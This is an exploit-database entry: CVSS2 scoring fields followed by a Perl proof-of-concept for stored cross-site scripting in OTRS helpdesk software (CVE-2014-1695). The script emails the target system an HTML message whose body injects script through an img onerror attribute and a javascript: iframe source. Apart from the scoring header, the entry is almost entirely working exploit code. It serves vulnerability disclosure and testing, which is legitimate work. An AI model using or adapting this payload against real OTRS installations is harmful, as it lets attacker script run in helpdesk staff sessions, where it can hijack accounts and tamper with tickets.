CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
AI Score
Confidence
High
EPSS
Percentile
92.4%
# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS
# Date: 28.01.2014
# Exploit Author: Adam Ziaja http://adamziaja.com
# Vendor Homepage: https://www.otrs.com
# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5
# CVE : CVE-2014-1695
#!/usr/bin/perl -w
use strict;
use MIME::Lite;
my $msg = MIME::Lite->new(
Subject => 'OTRS XSS PoC',
From => '[email protected]',
To => '[email protected]',
Type => 'text/html',
Data =>
'<html><body><img/onerror="alert(\'XSS1\')"src=a><iframe
src=javascript:alert(\'XSS2\') ></body></html>'
);
$msg->send();